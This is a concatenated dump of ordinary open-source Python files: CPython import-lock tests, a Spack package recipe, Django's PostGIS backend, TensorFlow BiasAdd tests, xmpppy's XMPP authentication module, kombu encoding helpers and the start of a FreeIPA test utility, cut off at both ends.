def test_no_deadlock(self):
results = self.run_deadlock_avoidance_test(False)
self.assertEqual(results.count((True, False)), 0)
self.assertEqual(results.count((True, True)), len(results))
@unittest.skipUnless(threading, "threads needed for this test")
class Frozen_DeadlockAvoidanceTests(DeadlockAvoidanceTests, unittest.TestCase):
LockType = frozen_bootstrap._ModuleLock
DeadlockError = frozen_bootstrap._DeadlockError
@unittest.skipUnless(threading, "threads needed for this test")
class Source_DeadlockAvoidanceTests(DeadlockAvoidanceTests, unittest.TestCase):
LockType = source_bootstrap._ModuleLock
DeadlockError = source_bootstrap._DeadlockError
class LifetimeTests:
def test_lock_lifetime(self):
name = "xyzzy"
self.assertNotIn(name, self.bootstrap._module_locks)
lock = self.bootstrap._get_module_lock(name)
self.assertIn(name, self.bootstrap._module_locks)
wr = weakref.ref(lock)
del lock
support.gc_collect()
self.assertNotIn(name, self.bootstrap._module_locks)
self.assertIsNone(wr())
def test_all_locks(self):
support.gc_collect()
self.assertEqual(0, len(self.bootstrap._module_locks),
self.bootstrap._module_locks)
class Frozen_LifetimeTests(LifetimeTests, unittest.TestCase):
bootstrap = frozen_bootstrap
class Source_LifetimeTests(LifetimeTests, unittest.TestCase):
bootstrap = source_bootstrap
@support.reap_threads
def test_main():
support.run_unittest(Frozen_ModuleLockAsRLockTests,
Source_ModuleLockAsRLockTests,
Frozen_DeadlockAvoidanceTests,
Source_DeadlockAvoidanceTests,
Frozen_LifetimeTests,
Source_LifetimeTests)
if __name__ == '__main__':
test_main()
|
rspavel/spack | refs/heads/develop | var/spack/repos/builtin/packages/miniqmc/package.py | 3 | # Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Miniqmc(CMakePackage):
"""A simplified real space QMC code for algorithm development,
performance portability testing, and computer science experiments
"""
homepage = "https://github.com/QMCPACK/miniqmc"
url = "https://github.com/QMCPACK/miniqmc/archive/0.2.0.tar.gz"
version('0.4.0', sha256='41ddb5de6dcc85404344c80dc7538aedf5e1f1eb0f2a67ebac069209f7dd11e4')
version('0.3.0', sha256='3ba494ba1055df91e157cb426d1fbe4192aa3f04b019277d9e571d057664d5a9')
version('0.2.0', sha256='cdf6fc6df6ccc1e034c62f937c040bfd6a4e65a0974b95f6884edd004ae36ee4')
tags = ['proxy-app', 'ecp-proxy-app']
depends_on('mpi')
depends_on('lapack')
def cmake_args(self):
args = [
'-DCMAKE_CXX_COMPILER=%s' % self.spec['mpi'].mpicxx,
'-DCMAKE_C_COMPILER=%s' % self.spec['mpi'].mpicc
]
return args
def install(self, spec, prefix):
install_tree(join_path('../spack-build', 'bin'), prefix.bin)
install_tree(join_path('../spack-build', 'lib'), prefix.lib)
|
sephii/django | refs/heads/master | django/contrib/gis/db/backends/postgis/base.py | 5 | from django.conf import settings
from django.db.backends import NO_DB_ALIAS
from django.db.backends.postgresql_psycopg2.base import (
DatabaseWrapper as Psycopg2DatabaseWrapper,
DatabaseFeatures as Psycopg2DatabaseFeatures
)
from django.contrib.gis.db.backends.base import BaseSpatialFeatures
from django.contrib.gis.db.backends.postgis.creation import PostGISCreation
from django.contrib.gis.db.backends.postgis.introspection import PostGISIntrospection
from django.contrib.gis.db.backends.postgis.operations import PostGISOperations
from django.contrib.gis.db.backends.postgis.schema import PostGISSchemaEditor
from django.utils.functional import cached_property
class DatabaseFeatures(BaseSpatialFeatures, Psycopg2DatabaseFeatures):
supports_3d_functions = True
supports_left_right_lookups = True
class DatabaseWrapper(Psycopg2DatabaseWrapper):
SchemaEditorClass = PostGISSchemaEditor
def __init__(self, *args, **kwargs):
super(DatabaseWrapper, self).__init__(*args, **kwargs)
if kwargs.get('alias', '') != NO_DB_ALIAS:
self.features = DatabaseFeatures(self)
self.creation = PostGISCreation(self)
self.ops = PostGISOperations(self)
self.introspection = PostGISIntrospection(self)
@cached_property
def template_postgis(self):
template_postgis = getattr(settings, 'POSTGIS_TEMPLATE', 'template_postgis')
with self._nodb_connection.cursor() as cursor:
cursor.execute('SELECT 1 FROM pg_database WHERE datname = %s LIMIT 1;', (template_postgis,))
if cursor.fetchone():
return template_postgis
return None
def prepare_database(self):
super(DatabaseWrapper, self).prepare_database()
if self.template_postgis is None:
# Check that postgis extension is installed on PostGIS >= 2
with self.cursor() as cursor:
cursor.execute("CREATE EXTENSION IF NOT EXISTS postgis")
|
alsrgv/tensorflow | refs/heads/master | tensorflow/python/kernel_tests/bias_op_test.py | 6 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Functional tests for BiasAdd."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gradient_checker
from tensorflow.python.ops import gradients_impl
from tensorflow.python.ops import nn_ops
import tensorflow.python.ops.nn_grad # pylint: disable=unused-import
from tensorflow.python.platform import test
class BiasAddTest(test.TestCase):
def _npBias(self, inputs, bias):
assert len(bias.shape) == 1
assert inputs.shape[-1] == bias.shape[0]
return inputs + bias.reshape(([1] * (len(inputs.shape) - 1)) +
[bias.shape[0]])
def testNpBias(self):
self.assertAllClose(
np.array([[11, 22, 33], [41, 52, 63]]),
self._npBias(
np.array([[10, 20, 30], [40, 50, 60]]), np.array([1, 2, 3])))
def _testBias(self, np_inputs, np_bias, use_gpu=False):
np_val = self._npBias(np_inputs, np_bias)
with self.cached_session(use_gpu=use_gpu):
tf_val = nn_ops.bias_add(np_inputs, np_bias).eval()
self.assertAllCloseAccordingToType(np_val, tf_val)
def _AtLeast3d(self, np_value):
# fill the input value to at least 3-dimension
if np_value.ndim < 3:
return np.reshape(np_value, (1,) * (3 - np_value.ndim) + np_value.shape)
return np_value
def _NHWCToNCHW(self, np_value):
# fill the input value to at least 3-dimension
np_value = self._AtLeast3d(np_value)
# move the last dimension to second
np_dim = list(range(np_value.ndim))
np_dim_new = list(np_dim[0:1]) + list(np_dim[-1:]) + list(np_dim[1:-1])
return np.transpose(np_value, np_dim_new)
def _NCHWToNHWC(self, np_value):
assert len(np_value.shape) >= 3
np_dim = list(range(np_value.ndim))
# move the second dimension to the last
np_dim_new = list(np_dim[0:1]) + list(np_dim[2:]) + list(np_dim[1:2])
return np.transpose(np_value, np_dim_new)
def _testBiasNCHW(self, np_inputs, np_bias, use_gpu):
np_val = self._npBias(np_inputs, np_bias)
np_inputs = self._NHWCToNCHW(np_inputs)
with self.cached_session(use_gpu=use_gpu):
tf_val = nn_ops.bias_add(np_inputs, np_bias, data_format="NCHW").eval()
tf_val = self._NCHWToNHWC(tf_val)
self.assertAllCloseAccordingToType(self._AtLeast3d(np_val), tf_val)
def _testAll(self, np_inputs, np_bias):
self._testBias(np_inputs, np_bias, use_gpu=False)
self._testBiasNCHW(np_inputs, np_bias, use_gpu=False)
if np_inputs.dtype in [np.float16, np.float32, np.float64]:
self._testBias(np_inputs, np_bias, use_gpu=True)
self._testBiasNCHW(np_inputs, np_bias, use_gpu=True)
@test_util.run_deprecated_v1
def testInputDims(self):
with self.assertRaises(ValueError):
nn_ops.bias_add([1, 2], [1])
@test_util.run_deprecated_v1
def testBiasVec(self):
with self.assertRaises(ValueError):
nn_ops.bias_add(
array_ops.reshape(
[1, 2], shape=[1, 2]),
array_ops.reshape(
[1, 2], shape=[1, 2]))
@test_util.run_deprecated_v1
def testBiasInputsMatch(self):
with self.assertRaises(ValueError):
nn_ops.bias_add(
array_ops.reshape(
[1, 2], shape=[1, 2]),
array_ops.reshape(
[1], shape=[1]))
@test_util.run_deprecated_v1
def testIntTypes(self):
for t in [np.int8, np.int16, np.int32, np.int64]:
self._testAll(
np.array([[10, 20, 30], [40, 50, 60]]).astype(t),
np.array([1, 2, 3]).astype(t))
@test_util.run_deprecated_v1
def testFloatTypes(self):
for t in [np.float16, np.float32, np.float64]:
self._testAll(
np.random.rand(4, 3, 3).astype(t), np.random.rand(3).astype(t))
@test_util.run_deprecated_v1
def test4DFloatTypes(self):
for t in [np.float16, np.float32, np.float64]:
self._testAll(
np.random.rand(4, 3, 2, 3).astype(t),
np.random.rand(3).astype(t))
self._testAll(
np.random.rand(2048, 4, 4, 4).astype(t),
np.random.rand(4).astype(t))
self._testAll(
np.random.rand(4, 4, 4, 2048).astype(t),
np.random.rand(2048).astype(t))
@test_util.run_deprecated_v1
def test5DFloatTypes(self):
for t in [np.float16, np.float32, np.float64]:
self._testAll(
np.random.rand(4, 3, 2, 3, 4).astype(t),
np.random.rand(4).astype(t))
def _testGradient(self, np_input, bias, dtype, data_format, use_gpu):
with self.cached_session(use_gpu=use_gpu):
if data_format == "NCHW":
np_input = self._NHWCToNCHW(np_input)
input_tensor = constant_op.constant(
np_input, shape=np_input.shape, dtype=dtype)
bias_tensor = constant_op.constant(bias, shape=bias.shape, dtype=dtype)
output_tensor = nn_ops.bias_add(
input_tensor, bias_tensor, data_format=data_format)
tensor_jacob_t, tensor_jacob_n = gradient_checker.compute_gradient(
input_tensor, np_input.shape, output_tensor, np_input.shape)
bias_jacob_t, bias_jacob_n = gradient_checker.compute_gradient(
bias_tensor, bias.shape, output_tensor, np_input.shape)
# Test gradient of BiasAddGrad
bias_add_grad = gradients_impl.gradients(
nn_ops.l2_loss(output_tensor), bias_tensor)[0]
grad_jacob_t, grad_jacob_n = gradient_checker.compute_gradient(
output_tensor, np_input.shape, bias_add_grad, bias.shape)
if dtype == np.float16:
# Compare fp16 theoretical gradients to fp32 numerical gradients,
# since fp16 numerical gradients are too imprecise unless great
# care is taken with choosing the inputs and the delta. This is
# a weaker check (in particular, it does not test the op itself,
# only its gradient), but it's much better than nothing.
input_tensor = constant_op.constant(
np_input, shape=np_input.shape, dtype=np.float32)
bias_tensor = constant_op.constant(
bias, shape=bias.shape, dtype=np.float32)
output_tensor = nn_ops.bias_add(
input_tensor, bias_tensor, data_format=data_format)
_, tensor_jacob_n = gradient_checker.compute_gradient(input_tensor,
np_input.shape,
output_tensor,
np_input.shape)
_, bias_jacob_n = gradient_checker.compute_gradient(bias_tensor,
bias.shape,
output_tensor,
np_input.shape)
bias_add_grad = gradients_impl.gradients(
nn_ops.l2_loss(output_tensor), bias_tensor)[0]
_, grad_jacob_n = gradient_checker.compute_gradient(output_tensor,
np_input.shape,
bias_add_grad,
bias.shape)
threshold = 5e-3
if dtype == dtypes.float64:
threshold = 1e-10
self.assertAllClose(tensor_jacob_t, tensor_jacob_n, threshold, threshold)
self.assertAllClose(bias_jacob_t, bias_jacob_n, threshold, threshold)
self.assertAllClose(grad_jacob_t, grad_jacob_n, threshold, threshold)
@test_util.run_deprecated_v1
def testGradientTensor2D(self):
for (data_format, use_gpu) in ("NHWC", False), ("NHWC", True):
for dtype in (dtypes.float16, dtypes.float32, dtypes.float64):
np_input = np.array(
[1.0, 2.0, 3.0, 4.0, 5.0, 6.0],
dtype=dtype.as_numpy_dtype).reshape(3, 2)
bias = np.array([1.3, 2.4], dtype=dtype.as_numpy_dtype)
self._testGradient(np_input, bias, dtype, data_format, use_gpu)
@test_util.run_deprecated_v1
def testGradientTensor3D(self):
for (data_format, use_gpu) in [("NHWC", False), ("NHWC", True),
("NCHW", False), ("NCHW", True)]:
for dtype in (dtypes.float16, dtypes.float32, dtypes.float64):
np_input = np.array([1.0, 2.0, 3.0, 4.0, 5.0, 6.0],
dtype=dtype.as_numpy_dtype).reshape(1, 3, 2)
bias = np.array([1.3, 2.4], dtype=dtype.as_numpy_dtype)
self._testGradient(np_input, bias, dtype, data_format, use_gpu)
@test_util.run_deprecated_v1
def testGradientTensor4D(self):
for (data_format, use_gpu) in [("NHWC", False)]:
for dtype in (dtypes.float16, dtypes.float32, dtypes.float64):
np_input = np.arange(
1.0, 49.0, dtype=dtype.as_numpy_dtype).reshape(
[2, 3, 4, 2]).astype(np.float32)
bias = np.array([1.3, 2.4], dtype=dtype.as_numpy_dtype)
self._testGradient(np_input, bias, dtype, data_format, use_gpu)
np_input = np.arange(
1.0, 513.0, dtype=dtype.as_numpy_dtype).reshape(
[64, 2, 2, 2]).astype(np.float32)
self._testGradient(np_input, bias, dtype, data_format, use_gpu)
np_input = np.arange(
1.0, 513.0, dtype=dtype.as_numpy_dtype).reshape(
[2, 2, 2, 64]).astype(np.float32)
self._testGradient(np_input,
np.random.rand(64).astype(dtype.as_numpy_dtype),
dtype, data_format, use_gpu)
@test_util.run_deprecated_v1
def testGradientTensor5D(self):
for (data_format, use_gpu) in [("NHWC", False), ("NHWC", True),
("NCHW", False), ("NCHW", True)]:
for dtype in (dtypes.float16, dtypes.float32, dtypes.float64):
np_input = np.arange(
1.0, 49.0, dtype=dtype.as_numpy_dtype).reshape(
[1, 2, 3, 4, 2]).astype(np.float32)
bias = np.array([1.3, 2.4], dtype=dtype.as_numpy_dtype)
self._testGradient(np_input, bias, dtype, data_format, use_gpu)
@test_util.run_deprecated_v1
def testEmpty(self):
np.random.seed(7)
for shape in (0, 0), (2, 0), (0, 2), (4, 3, 0), (4, 0, 3), (0, 4, 3):
self._testAll(np.random.randn(*shape), np.random.randn(shape[-1]))
@test_util.run_deprecated_v1
def testEmptyGradient(self):
for (data_format, use_gpu) in ("NHWC", False), ("NHWC", True):
for shape in (0, 0), (2, 0), (0, 2):
self._testGradient(
np.random.randn(*shape), np.random.randn(shape[-1]), dtypes.float64,
data_format, use_gpu)
for (data_format, use_gpu) in [("NHWC", False), ("NHWC", True),
("NCHW", False), ("NCHW", True)]:
for shape in (4, 3, 0), (4, 0, 3), (0, 4, 3):
self._testGradient(
np.random.randn(*shape),
np.random.randn(shape[-1]), dtypes.float64, data_format, use_gpu)
if __name__ == "__main__":
test.main()
|
jordan8037310/CouchPotatoServer | refs/heads/master | libs/xmpp/auth.py | 196 | ## auth.py
##
## Copyright (C) 2003-2005 Alexey "Snake" Nezhdanov
##
## This program is free software; you can redistribute it and/or modify
## it under the terms of the GNU General Public License as published by
## the Free Software Foundation; either version 2, or (at your option)
## any later version.
##
## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License for more details.
# $Id: auth.py,v 1.41 2008/09/13 21:45:21 normanr Exp $
"""
Provides library with all Non-SASL and SASL authentication mechanisms.
Can be used both for client and transport authentication.
"""
from protocol import *
from client import PlugIn
import sha,base64,random,dispatcher,re
import md5
def HH(some): return md5.new(some).hexdigest()
def H(some): return md5.new(some).digest()
def C(some): return ':'.join(some)
class NonSASL(PlugIn):
""" Implements old Non-SASL (JEP-0078) authentication used in jabberd1.4 and transport authentication."""
def __init__(self,user,password,resource):
""" Caches username, password and resource for auth. """
PlugIn.__init__(self)
self.DBG_LINE='gen_auth'
self.user=user
self.password=password
self.resource=resource
def plugin(self,owner):
""" Determine the best auth method (digest/0k/plain) and use it for auth.
Returns used method name on success. Used internally. """
if not self.resource: return self.authComponent(owner)
self.DEBUG('Querying server about possible auth methods','start')
resp=owner.Dispatcher.SendAndWaitForResponse(Iq('get',NS_AUTH,payload=[Node('username',payload=[self.user])]))
if not isResultNode(resp):
self.DEBUG('No result node arrived! Aborting...','error')
return
iq=Iq(typ='set',node=resp)
query=iq.getTag('query')
query.setTagData('username',self.user)
query.setTagData('resource',self.resource)
if query.getTag('digest'):
self.DEBUG("Performing digest authentication",'ok')
query.setTagData('digest',sha.new(owner.Dispatcher.Stream._document_attrs['id']+self.password).hexdigest())
if query.getTag('password'): query.delChild('password')
method='digest'
elif query.getTag('token'):
token=query.getTagData('token')
seq=query.getTagData('sequence')
self.DEBUG("Performing zero-k authentication",'ok')
hash = sha.new(sha.new(self.password).hexdigest()+token).hexdigest()
for foo in xrange(int(seq)): hash = sha.new(hash).hexdigest()
query.setTagData('hash',hash)
method='0k'
else:
self.DEBUG("Sequre methods unsupported, performing plain text authentication",'warn')
query.setTagData('password',self.password)
method='plain'
resp=owner.Dispatcher.SendAndWaitForResponse(iq)
if isResultNode(resp):
self.DEBUG('Sucessfully authenticated with remove host.','ok')
owner.User=self.user
owner.Resource=self.resource
owner._registered_name=owner.User+'@'+owner.Server+'/'+owner.Resource
return method
self.DEBUG('Authentication failed!','error')
def authComponent(self,owner):
""" Authenticate component. Send handshake stanza and wait for result. Returns "ok" on success. """
self.handshake=0
owner.send(Node(NS_COMPONENT_ACCEPT+' handshake',payload=[sha.new(owner.Dispatcher.Stream._document_attrs['id']+self.password).hexdigest()]))
owner.RegisterHandler('handshake',self.handshakeHandler,xmlns=NS_COMPONENT_ACCEPT)
while not self.handshake:
self.DEBUG("waiting on handshake",'notify')
owner.Process(1)
owner._registered_name=self.user
if self.handshake+1: return 'ok'
def handshakeHandler(self,disp,stanza):
""" Handler for registering in dispatcher for accepting transport authentication. """
if stanza.getName()=='handshake': self.handshake=1
else: self.handshake=-1
class SASL(PlugIn):
""" Implements SASL authentication. """
def __init__(self,username,password):
PlugIn.__init__(self)
self.username=username
self.password=password
def plugin(self,owner):
if not self._owner.Dispatcher.Stream._document_attrs.has_key('version'): self.startsasl='not-supported'
elif self._owner.Dispatcher.Stream.features:
try: self.FeaturesHandler(self._owner.Dispatcher,self._owner.Dispatcher.Stream.features)
except NodeProcessed: pass
else: self.startsasl=None
def auth(self):
""" Start authentication. Result can be obtained via "SASL.startsasl" attribute and will be
either "success" or "failure". Note that successfull auth will take at least
two Dispatcher.Process() calls. """
if self.startsasl: pass
elif self._owner.Dispatcher.Stream.features:
try: self.FeaturesHandler(self._owner.Dispatcher,self._owner.Dispatcher.Stream.features)
except NodeProcessed: pass
else: self._owner.RegisterHandler('features',self.FeaturesHandler,xmlns=NS_STREAMS)
def plugout(self):
""" Remove SASL handlers from owner's dispatcher. Used internally. """
if self._owner.__dict__.has_key('features'): self._owner.UnregisterHandler('features',self.FeaturesHandler,xmlns=NS_STREAMS)
if self._owner.__dict__.has_key('challenge'): self._owner.UnregisterHandler('challenge',self.SASLHandler,xmlns=NS_SASL)
if self._owner.__dict__.has_key('failure'): self._owner.UnregisterHandler('failure',self.SASLHandler,xmlns=NS_SASL)
if self._owner.__dict__.has_key('success'): self._owner.UnregisterHandler('success',self.SASLHandler,xmlns=NS_SASL)
def FeaturesHandler(self,conn,feats):
""" Used to determine if server supports SASL auth. Used internally. """
if not feats.getTag('mechanisms',namespace=NS_SASL):
self.startsasl='not-supported'
self.DEBUG('SASL not supported by server','error')
return
mecs=[]
for mec in feats.getTag('mechanisms',namespace=NS_SASL).getTags('mechanism'):
mecs.append(mec.getData())
self._owner.RegisterHandler('challenge',self.SASLHandler,xmlns=NS_SASL)
self._owner.RegisterHandler('failure',self.SASLHandler,xmlns=NS_SASL)
self._owner.RegisterHandler('success',self.SASLHandler,xmlns=NS_SASL)
if "ANONYMOUS" in mecs and self.username == None:
node=Node('auth',attrs={'xmlns':NS_SASL,'mechanism':'ANONYMOUS'})
elif "DIGEST-MD5" in mecs:
node=Node('auth',attrs={'xmlns':NS_SASL,'mechanism':'DIGEST-MD5'})
elif "PLAIN" in mecs:
sasl_data='%s\x00%s\x00%s'%(self.username+'@'+self._owner.Server,self.username,self.password)
node=Node('auth',attrs={'xmlns':NS_SASL,'mechanism':'PLAIN'},payload=[base64.encodestring(sasl_data).replace('\r','').replace('\n','')])
else:
self.startsasl='failure'
self.DEBUG('I can only use DIGEST-MD5 and PLAIN mecanisms.','error')
return
self.startsasl='in-process'
self._owner.send(node.__str__())
raise NodeProcessed
def SASLHandler(self,conn,challenge):
""" Perform next SASL auth step. Used internally. """
if challenge.getNamespace()<>NS_SASL: return
if challenge.getName()=='failure':
self.startsasl='failure'
try: reason=challenge.getChildren()[0]
except: reason=challenge
self.DEBUG('Failed SASL authentification: %s'%reason,'error')
raise NodeProcessed
elif challenge.getName()=='success':
self.startsasl='success'
self.DEBUG('Successfully authenticated with remote server.','ok')
handlers=self._owner.Dispatcher.dumpHandlers()
self._owner.Dispatcher.PlugOut()
dispatcher.Dispatcher().PlugIn(self._owner)
self._owner.Dispatcher.restoreHandlers(handlers)
self._owner.User=self.username
raise NodeProcessed
########################################3333
incoming_data=challenge.getData()
chal={}
data=base64.decodestring(incoming_data)
self.DEBUG('Got challenge:'+data,'ok')
for pair in re.findall('(\w+\s*=\s*(?:(?:"[^"]+")|(?:[^,]+)))',data):
key,value=[x.strip() for x in pair.split('=', 1)]
if value[:1]=='"' and value[-1:]=='"': value=value[1:-1]
chal[key]=value
if chal.has_key('qop') and 'auth' in [x.strip() for x in chal['qop'].split(',')]:
resp={}
resp['username']=self.username
resp['realm']=self._owner.Server
resp['nonce']=chal['nonce']
cnonce=''
for i in range(7):
cnonce+=hex(int(random.random()*65536*4096))[2:]
resp['cnonce']=cnonce
resp['nc']=('00000001')
resp['qop']='auth'
resp['digest-uri']='xmpp/'+self._owner.Server
A1=C([H(C([resp['username'],resp['realm'],self.password])),resp['nonce'],resp['cnonce']])
A2=C(['AUTHENTICATE',resp['digest-uri']])
response= HH(C([HH(A1),resp['nonce'],resp['nc'],resp['cnonce'],resp['qop'],HH(A2)]))
resp['response']=response
resp['charset']='utf-8'
sasl_data=''
for key in ['charset','username','realm','nonce','nc','cnonce','digest-uri','response','qop']:
if key in ['nc','qop','response','charset']: sasl_data+="%s=%s,"%(key,resp[key])
else: sasl_data+='%s="%s",'%(key,resp[key])
########################################3333
node=Node('response',attrs={'xmlns':NS_SASL},payload=[base64.encodestring(sasl_data[:-1]).replace('\r','').replace('\n','')])
self._owner.send(node.__str__())
elif chal.has_key('rspauth'): self._owner.send(Node('response',attrs={'xmlns':NS_SASL}).__str__())
else:
self.startsasl='failure'
self.DEBUG('Failed SASL authentification: unknown challenge','error')
raise NodeProcessed
class Bind(PlugIn):
""" Bind some JID to the current connection to allow router know of our location."""
def __init__(self):
PlugIn.__init__(self)
self.DBG_LINE='bind'
self.bound=None
def plugin(self,owner):
""" Start resource binding, if allowed at this time. Used internally. """
if self._owner.Dispatcher.Stream.features:
try: self.FeaturesHandler(self._owner.Dispatcher,self._owner.Dispatcher.Stream.features)
except NodeProcessed: pass
else: self._owner.RegisterHandler('features',self.FeaturesHandler,xmlns=NS_STREAMS)
def plugout(self):
""" Remove Bind handler from owner's dispatcher. Used internally. """
self._owner.UnregisterHandler('features',self.FeaturesHandler,xmlns=NS_STREAMS)
def FeaturesHandler(self,conn,feats):
""" Determine if server supports resource binding and set some internal attributes accordingly. """
if not feats.getTag('bind',namespace=NS_BIND):
self.bound='failure'
self.DEBUG('Server does not requested binding.','error')
return
if feats.getTag('session',namespace=NS_SESSION): self.session=1
else: self.session=-1
self.bound=[]
def Bind(self,resource=None):
""" Perform binding. Use provided resource name or random (if not provided). """
while self.bound is None and self._owner.Process(1): pass
if resource: resource=[Node('resource',payload=[resource])]
else: resource=[]
resp=self._owner.SendAndWaitForResponse(Protocol('iq',typ='set',payload=[Node('bind',attrs={'xmlns':NS_BIND},payload=resource)]))
if isResultNode(resp):
self.bound.append(resp.getTag('bind').getTagData('jid'))
self.DEBUG('Successfully bound %s.'%self.bound[-1],'ok')
jid=JID(resp.getTag('bind').getTagData('jid'))
self._owner.User=jid.getNode()
self._owner.Resource=jid.getResource()
resp=self._owner.SendAndWaitForResponse(Protocol('iq',typ='set',payload=[Node('session',attrs={'xmlns':NS_SESSION})]))
if isResultNode(resp):
self.DEBUG('Successfully opened session.','ok')
self.session=1
return 'ok'
else:
self.DEBUG('Session open failed.','error')
self.session=0
elif resp: self.DEBUG('Binding failed: %s.'%resp.getTag('error'),'error')
else:
self.DEBUG('Binding failed: timeout expired.','error')
return ''
class ComponentBind(PlugIn):
""" ComponentBind some JID to the current connection to allow router know of our location."""
def __init__(self, sasl):
PlugIn.__init__(self)
self.DBG_LINE='bind'
self.bound=None
self.needsUnregister=None
self.sasl = sasl
def plugin(self,owner):
""" Start resource binding, if allowed at this time. Used internally. """
if not self.sasl:
self.bound=[]
return
if self._owner.Dispatcher.Stream.features:
try: self.FeaturesHandler(self._owner.Dispatcher,self._owner.Dispatcher.Stream.features)
except NodeProcessed: pass
else:
self._owner.RegisterHandler('features',self.FeaturesHandler,xmlns=NS_STREAMS)
self.needsUnregister=1
def plugout(self):
""" Remove ComponentBind handler from owner's dispatcher. Used internally. """
if self.needsUnregister:
self._owner.UnregisterHandler('features',self.FeaturesHandler,xmlns=NS_STREAMS)
def FeaturesHandler(self,conn,feats):
""" Determine if server supports resource binding and set some internal attributes accordingly. """
if not feats.getTag('bind',namespace=NS_BIND):
self.bound='failure'
self.DEBUG('Server does not requested binding.','error')
return
if feats.getTag('session',namespace=NS_SESSION): self.session=1
else: self.session=-1
self.bound=[]
def Bind(self,domain=None):
""" Perform binding. Use provided domain name (if not provided). """
while self.bound is None and self._owner.Process(1): pass
if self.sasl:
xmlns = NS_COMPONENT_1
else:
xmlns = None
self.bindresponse = None
ttl = dispatcher.DefaultTimeout
self._owner.RegisterHandler('bind',self.BindHandler,xmlns=xmlns)
self._owner.send(Protocol('bind',attrs={'name':domain},xmlns=NS_COMPONENT_1))
while self.bindresponse is None and self._owner.Process(1) and ttl > 0: ttl-=1
self._owner.UnregisterHandler('bind',self.BindHandler,xmlns=xmlns)
resp=self.bindresponse
if resp and resp.getAttr('error'):
self.DEBUG('Binding failed: %s.'%resp.getAttr('error'),'error')
elif resp:
self.DEBUG('Successfully bound.','ok')
return 'ok'
else:
self.DEBUG('Binding failed: timeout expired.','error')
return ''
def BindHandler(self,conn,bind):
self.bindresponse = bind
pass
|
CamelBackNotation/CarnotKE | refs/heads/master | jyhton/Lib/test/bugs/pr144.py | 31 | from java.lang import *
Class.isArray(Thread)
|
tkanemoto/kombu | refs/heads/master | kombu/utils/encoding.py | 39 | # -*- coding: utf-8 -*-
"""
kombu.utils.encoding
~~~~~~~~~~~~~~~~~~~~~
Utilities to encode text, and to safely emit text from running
applications without crashing with the infamous :exc:`UnicodeDecodeError`
exception.
"""
from __future__ import absolute_import
import sys
import traceback
from kombu.five import text_t
is_py3k = sys.version_info >= (3, 0)
#: safe_str takes encoding from this file by default.
#: :func:`set_default_encoding_file` can used to set the
#: default output file.
default_encoding_file = None
def set_default_encoding_file(file):
global default_encoding_file
default_encoding_file = file
def get_default_encoding_file():
return default_encoding_file
if sys.platform.startswith('java'): # pragma: no cover
def default_encoding(file=None):
return 'utf-8'
else:
def default_encoding(file=None): # noqa
file = file or get_default_encoding_file()
return getattr(file, 'encoding', None) or sys.getfilesystemencoding()
if is_py3k: # pragma: no cover
def str_to_bytes(s):
if isinstance(s, str):
return s.encode()
return s
def bytes_to_str(s):
if isinstance(s, bytes):
return s.decode()
return s
def from_utf8(s, *args, **kwargs):
return s
def ensure_bytes(s):
if not isinstance(s, bytes):
return str_to_bytes(s)
return s
def default_encode(obj):
return obj
str_t = str
else:
def str_to_bytes(s): # noqa
if isinstance(s, unicode):
return s.encode()
return s
def bytes_to_str(s): # noqa
return s
def from_utf8(s, *args, **kwargs): # noqa
return s.encode('utf-8', *args, **kwargs)
def default_encode(obj, file=None): # noqa
return unicode(obj, default_encoding(file))
str_t = unicode
ensure_bytes = str_to_bytes
try:
bytes_t = bytes
except NameError: # pragma: no cover
bytes_t = str # noqa
def safe_str(s, errors='replace'):
s = bytes_to_str(s)
if not isinstance(s, (text_t, bytes)):
return safe_repr(s, errors)
return _safe_str(s, errors)
if is_py3k:
def _safe_str(s, errors='replace', file=None):
if isinstance(s, str):
return s
try:
return str(s)
except Exception as exc:
return '<Unrepresentable {0!r}: {1!r} {2!r}>'.format(
type(s), exc, '\n'.join(traceback.format_stack()))
else:
def _safe_str(s, errors='replace', file=None): # noqa
encoding = default_encoding(file)
try:
if isinstance(s, unicode):
return s.encode(encoding, errors)
return unicode(s, encoding, errors)
except Exception as exc:
return '<Unrepresentable {0!r}: {1!r} {2!r}>'.format(
type(s), exc, '\n'.join(traceback.format_stack()))
def safe_repr(o, errors='replace'):
try:
return repr(o)
except Exception:
return _safe_str(o, errors)
|
jtux270/translate | refs/heads/master | FreeIPA/freeipa-3.0.0/tests/util.py | 2 | # Authors:
# Jason Gerard DeRose <jderose@redhat.com>
#
# Copyright (C) 2008 Red Hat
# see file 'COPYING' for use and warranty information
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
Common utility functions and classes for unit tests.
"""
import inspect
import os
from os import path
import tempfile
import shutil
import re
import ipalib
from ipalib.plugable import Plugin
from ipalib.request import context
from ipapython.dn import DN
class TempDir(object):
def __init__(self):
self.__path = tempfile.mkdtemp(prefix='ipa.tests.')
assert self.path == self.__path
def __get_path(self):
assert path.abspath(self.__path) == self.__path
assert self.__path.startswith('/tmp/ipa.tests.')
assert path.isdir(self.__path) and not path.islink(self.__path)
return self.__path
path = property(__get_path)
def rmtree(self):
if self.__path is not None:
shutil.rmtree(self.path)
self.__path = None
def makedirs(self, *parts):
d = self.join(*parts)
if not path.exists(d):
